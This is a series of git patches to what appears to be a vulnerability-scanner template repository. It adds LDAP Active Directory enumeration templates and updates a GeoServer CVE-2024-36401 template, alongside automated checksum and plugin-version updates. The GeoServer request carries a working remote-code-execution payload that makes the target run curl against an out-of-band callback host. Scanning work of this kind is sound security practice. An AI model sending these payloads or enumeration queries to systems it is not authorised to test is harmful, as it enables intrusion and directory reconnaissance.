<65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 00:00:46 +0530 Subject: [PATCH 0835/1841] Ldap --- .../enumeration/ldap/ldap-get-ad-grp.yaml | 42 +++++++++++++++++++ .../enumeration/ldap/ldap-get-ad-users.yaml | 41 ++++++++++++++++++ .../enumeration/ldap/ldap-metadata.yaml | 37 ++++++++++++++++ 3 files changed, 120 insertions(+) create mode 100644 javascript/enumeration/ldap/ldap-get-ad-grp.yaml create mode 100644 javascript/enumeration/ldap/ldap-get-ad-users.yaml create mode 100644 javascript/enumeration/ldap/ldap-metadata.yaml diff --git a/javascript/enumeration/ldap/ldap-get-ad-grp.yaml b/javascript/enumeration/ldap/ldap-get-ad-grp.yaml new file mode 100644 index 0000000000..e789ad3345 --- /dev/null +++ b/javascript/enumeration/ldap/ldap-get-ad-grp.yaml @@ -0,0 +1,42 @@ +id: ldap-get-ad-grp + +info: + name: LDAP Get Active Directory Group - Enumeration + author: pussycat0x + severity: info + description: | + Attempts to list the supported capabilities in a SMBv2 server for each enabled dialect. + reference: + - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap.Client#getadgroups + metadata: + max-request: 1 + shodan-query: ldap + tags: js,network,ldap,enum + +javascript: + - code: | + const ldap = require('nuclei/ldap'); + const cfg = new ldap.Config(); + cfg.Upgrade = true; + const client = new ldap.Client(Host, Port, cfg); + const groups = client.GetADGroups(); + const bytes = require('nuclei/bytes'); + const buffer = new bytes.Buffer(); + for (const group of groups) { + buffer.WriteString("DistinguishedName: '" + group.DistinguishedName+ "' ,"); + buffer.WriteString("SAMAccountName: '" + group.SAMAccountName+ "' ,"); + buffer.WriteString("PWDLastSet: '" + group.PWDLastSet+ "' ,"); + buffer.WriteString("LastLogon: '" + group.LastLogon+ "' ,"); + buffer.WriteString("MemberOf: '" + group.MemberOf+ "' ,"); + buffer.WriteString("ServicePrincipalName: '" + group.ServicePrincipalName+ "' ,"); + } + Export(buffer.String()); + + args: + Host: "ldap://{{Host}}" + Port: 389 + + extractors: + - type: dsl + dsl: + - response \ No newline at end of file diff --git a/javascript/enumeration/ldap/ldap-get-ad-users.yaml b/javascript/enumeration/ldap/ldap-get-ad-users.yaml new file mode 100644 index 0000000000..5bf762ea72 --- /dev/null +++ b/javascript/enumeration/ldap/ldap-get-ad-users.yaml @@ -0,0 +1,41 @@ +id: ldap-get-ad-users +info: + name: LDAP Get Active Directory User - Enumeration + author: pussycat0x + severity: info + description: | + Retrieve users from Active Directory, where each user is represented by an ADObject. + reference: + - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap.ADObject + metadata: + max-request: 1 + shodan-query: ldap + tags: js,network,ldap,enum + +javascript: + - code: | + const ldap = require('nuclei/ldap'); + const cfg = new ldap.Config(); + cfg.Upgrade = true; + const client = ldap.Client(Host, Port, cfg); + const users = client.GetADUsers(); + const bytes = require('nuclei/bytes'); + const buffer = new bytes.Buffer(); + for (const user of users) { + buffer.WriteString("DistinguishedName: '" + user.DistinguishedName+ "' ,"); + buffer.WriteString("SAMAccountName: '" + user.SAMAccountName+ "' ,"); + buffer.WriteString("PWDLastSet: '" + user.PWDLastSet+ "' ,"); + buffer.WriteString("LastLogon: '" + user.LastLogon+ "' ,"); + buffer.WriteString("MemberOf: '" + user.MemberOf+ "' ,"); + buffer.WriteString("ServicePrincipalName: '" + user.ServicePrincipalName+ "' ,"); + } + Export(buffer.String()); + + args: + Host: "ldap://{{Host}}" + Port: 389 + + extractors: + - type: dsl + dsl: + - response \ No newline at end of file diff --git a/javascript/enumeration/ldap/ldap-metadata.yaml b/javascript/enumeration/ldap/ldap-metadata.yaml new file mode 100644 index 0000000000..87666e50b8 --- /dev/null +++ b/javascript/enumeration/ldap/ldap-metadata.yaml @@ -0,0 +1,37 @@ +id: ldap-metadata + +info: + name: LDAP Metadata - Enumeration + author: pussycat0x + severity: info + description: | + LDAP metadata refers to the data that describes the structure, schema, and attributes of the LDAP directory + reference: + - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ldap.Metadata + metadata: + max-request: 1 + shodan-query: ldap + tags: js,network,ldap + +javascript: + - code: | + const ldap = require('nuclei/ldap'); + const cfg = new ldap.Config(); + cfg.Upgrade = true; + const client = new ldap.Client(Host, Port, cfg); + const metadata = client.CollectMetadata(); + Export(metadata) + + args: + Host: "ldap://{{Host}}" + Port: 389 + + extractors: + - type: json + json: + - '"BaseDN: " + .BaseDN' + - '"DnsHostName: " + .DnsHostName ' + - '"DefaultNamingContext: "+ .DefaultNamingContext' + - '"DomainFunctionality: "+ .DomainFunctionality' + - '"ForestFunctionality: " + .ForestFunctionality' + - '"DomainControllerFunctionality: "+ .DomainControllerFunctionality' \ No newline at end of file From ed91710f727c91df4f934e7744c6df45e76731d2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 4 Jul 2024 00:09:15 +0530 Subject: [PATCH 0836/1841] final update --- http/cves/2024/CVE-2024-36401.yaml | 34 +++++++++++++++++++++++++----- 1 file changed, 29 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml index d096c52019..5d554c4dbf 100644 --- a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -1,14 +1,17 @@ id: CVE-2024-36401 info: - name: GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions + name: GeoServer RCE in Evaluating Property Name Expressions author: DhiyaneshDk severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. + impact: This vulnerability can lead to executing arbitrary code. reference: - https://x.com/sirifu4k1/status/1808270303275241607 - https://nvd.nist.gov/vuln/detail/CVE-2024-36401 + - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 + - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv metadata: verified: true max-request: 1 @@ -16,18 +19,39 @@ info: product: geoserver shodan-query: http.title:"geoserver" fofa-query: - - app="geoserver" - title="geoserver" + - app="geoserver" google-query: intitle:"geoserver" tags: cve,cve2024,geoserver,rce,unauth +flow: | + if(http(1)) + { + set("name",template.typename[0]) + http(2) + } + http: - raw: - | - @timeout 20s - GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1 + GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + extractors: + - type: regex + name: typename + part: body + group: 1 + regex: + - typeName=([^&\]]+) + internal: true + + - raw: + - | + @timeout 20s + GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1 Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 matchers-condition: and matchers: From 8e335f1cde1a9a63c4ac2008529aa6d3fc90b011 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 4 Jul 2024 00:09:29 +0530 Subject: [PATCH 0837/1841] matcher - update --- javascript/enumeration/ldap/ldap-get-ad-grp.yaml | 7 ++++++- javascript/enumeration/ldap/ldap-get-ad-users.yaml | 5 +++++ javascript/enumeration/ldap/ldap-metadata.yaml | 5 +++++ 3 files changed, 16 insertions(+), 1 deletion(-) diff --git a/javascript/enumeration/ldap/ldap-get-ad-grp.yaml b/javascript/enumeration/ldap/ldap-get-ad-grp.yaml index e789ad3345..89655a26ce 100644 --- a/javascript/enumeration/ldap/ldap-get-ad-grp.yaml +++ b/javascript/enumeration/ldap/ldap-get-ad-grp.yaml @@ -35,7 +35,12 @@ javascript: args: Host: "ldap://{{Host}}" Port: 389 - + + matchers: + - type: dsl + dsl: + - "success == true" + extractors: - type: dsl dsl: diff --git a/javascript/enumeration/ldap/ldap-get-ad-users.yaml b/javascript/enumeration/ldap/ldap-get-ad-users.yaml index 5bf762ea72..24fd3e0f86 100644 --- a/javascript/enumeration/ldap/ldap-get-ad-users.yaml +++ b/javascript/enumeration/ldap/ldap-get-ad-users.yaml @@ -35,6 +35,11 @@ javascript: Host: "ldap://{{Host}}" Port: 389 + matchers: + - type: dsl + dsl: + - "success == true" + extractors: - type: dsl dsl: diff --git a/javascript/enumeration/ldap/ldap-metadata.yaml b/javascript/enumeration/ldap/ldap-metadata.yaml index 87666e50b8..b49b21dc39 100644 --- a/javascript/enumeration/ldap/ldap-metadata.yaml +++ b/javascript/enumeration/ldap/ldap-metadata.yaml @@ -26,6 +26,11 @@ javascript: Host: "ldap://{{Host}}" Port: 389 + matchers: + - type: dsl + dsl: + - "success == true" + extractors: - type: json json: From 0dbefeaaad3fcf33dddd9386bc5e6ee4b60b037f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 3 Jul 2024 18:41:08 +0000 Subject: [PATCH 0838/1841] Auto Generated New Template Addition List [Wed Jul 3 18:41:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0a61ba7da4..49292bf449 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ http/misconfiguration/forgejo-repo-exposure.yaml http/misconfiguration/installer/kodbox-installer.yaml http/misconfiguration/installer/piwigo-installer.yaml http/misconfiguration/installer/poste-io-installer.yaml +http/misconfiguration/installer/subrion-installer.yaml http/misconfiguration/seq-dashboard-unath.yaml http/technologies/neo4j-neodash-detect.yaml http/technologies/wordpress/plugins/chaty.yaml From e01e6739c102f85310dec7401b1cc555b9676a95 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 18:41:15 +0000 Subject: [PATCH 0839/1841] Auto Generated Templates Checksum [Wed Jul 3 18:41:15 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 39d86811ff..271f6114ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5711,6 +5711,7 @@ http/misconfiguration/installer/snipe-it-installer.yaml:582748ffd95ef18e4a27db00 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:14a25f5be35d80683649fcac189993c8c514ee23 http/misconfiguration/installer/stackposts-installer.yaml:29af347900e7b1f9fd77a04fe02dfbf89020028f +http/misconfiguration/installer/subrion-installer.yaml:4306ed85c5fb6ddf8f356de7ce680479b026eb55 http/misconfiguration/installer/sugarcrm-install.yaml:a253a2bb6995ab8232ce780dcfaa5fa60f3a40ca http/misconfiguration/installer/suitecrm-installer.yaml:0c39360372f4dd838d49b82ba353aecb8a6d6b3b http/misconfiguration/installer/sumowebtools-installer.yaml:fd2852a171b68f3b8f5290b80da4c84daa1afbcc @@ -8155,7 +8156,7 @@ http/vulnerabilities/other/seacms-sqli.yaml:f2557fadc41230032cfad7aaa8143a270e0f http/vulnerabilities/other/seeyon-oa-log4j.yaml:96f97842102b78c5e0b1d69b837f21d229fc9e0e http/vulnerabilities/other/seowon-router-rce.yaml:d3f88b5db457f82269d3a12ae90a5d3b840b9737 http/vulnerabilities/other/servicenow-helpdesk-credential.yaml:fe8c27aed21831daadcca8c21e29c66941fd661a -http/vulnerabilities/other/sharp-printers-lfi.yaml:31380809dfb04443a00207f04535b168d58fe5da +http/vulnerabilities/other/sharp-printers-lfi.yaml:8f193a41f2a3ef8ef44f7f8f6d92af580191f5eb http/vulnerabilities/other/shoowbiz-xss.yaml:05930d6afad56df16826196777333587acf80310 http/vulnerabilities/other/sick-beard-xss.yaml:eb652b90fdac36a07eb3b58a37005befbdaa2585 http/vulnerabilities/other/sitemap-sql-injection.yaml:2b3ec87344ddfb723073b534383371158cf06904 @@ -8821,7 +8822,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:41c1ab714cb8c608872d318539b2a97b38d5b048 +templates-checksum.txt:e0f2f9acff1719f3d3932e4d400f918b578223e0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ac9934634761b9cbf8d3181d126b27ad7eb12f09 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 3 Jul 2024 18:41:54 +0000 Subject: [PATCH 0840/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index dd71d004e1..cad915145b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -28,6 +28,7 @@ on: - 'http/misconfiguration/installer/kodbox-installer.yaml' - 'http/misconfiguration/installer/piwigo-installer.yaml' - 'http/misconfiguration/installer/poste-io-installer.yaml' + - 'http/misconfiguration/installer/subrion-installer.yaml' - 'http/misconfiguration/seq-dashboard-unath.yaml' - 'http/technologies/neo4j-neodash-detect.yaml' - 'http/technologies/wordpress/plugins/chaty.yaml' From 2acc123884df21bd9c7ce357964475cdc753b421 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 18:42:54 +0000 Subject: [PATCH 0841/1841] Auto Template Signing [Wed Jul 3 18:42:54 UTC 2024] :robot: --- http/misconfiguration/installer/subrion-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/subrion-installer.yaml b/http/misconfiguration/installer/subrion-installer.yaml index 08ab013dc1..56461fe750 100644 --- a/http/misconfiguration/installer/subrion-installer.yaml +++ b/http/misconfiguration/installer/subrion-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 36a5b5122cdee99ec3382555ab3a2af236eeada2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Jul 2024 00:19:45 +0000 Subject: [PATCH 0842/1841] Auto WordPress Plugins Update [Thu Jul 4 00:19:45 UTC 2024] :robot: --- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/ocean-extra.txt | 2 +- helpers/wordpress/plugins/translatepress-multilingual.txt | 2 +- helpers/wordpress/plugins/updraftplus.txt | 2 +- helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt | 2 +- helpers/wordpress/plugins/wp-optimize.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 3 +-- http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 207 files changed, 8 insertions(+), 208 deletions(-) diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index e9b436e4f0..04a1609562 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -18.6.1 \ No newline at end of file +18.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ocean-extra.txt b/helpers/wordpress/plugins/ocean-extra.txt index 72d132f745..cc6612c36e 100644 --- a/helpers/wordpress/plugins/ocean-extra.txt +++ b/helpers/wordpress/plugins/ocean-extra.txt @@ -1 +1 @@ -2.2.9 \ No newline at end of file +2.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index 6533b66871..96d771776b 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.8.0 \ No newline at end of file +2.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/updraftplus.txt b/helpers/wordpress/plugins/updraftplus.txt index 95587e55b3..7ad7fa0185 100644 --- a/helpers/wordpress/plugins/updraftplus.txt +++ b/helpers/wordpress/plugins/updraftplus.txt @@ -1 +1 @@ -1.24.3 \ No newline at end of file +1.24.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt index 725ffd4c0f..589268e6fe 100644 --- a/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt +++ b/helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt @@ -1 +1 @@ -1.2.27 \ No newline at end of file +1.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt index 8cf6caf561..a423d4217b 100644 --- a/helpers/wordpress/plugins/wp-optimize.txt +++ b/helpers/wordpress/plugins/wp-optimize.txt @@ -1 +1 @@ -3.4.1 \ No newline at end of file +3.4.2 \ No newline at end of file diff --git 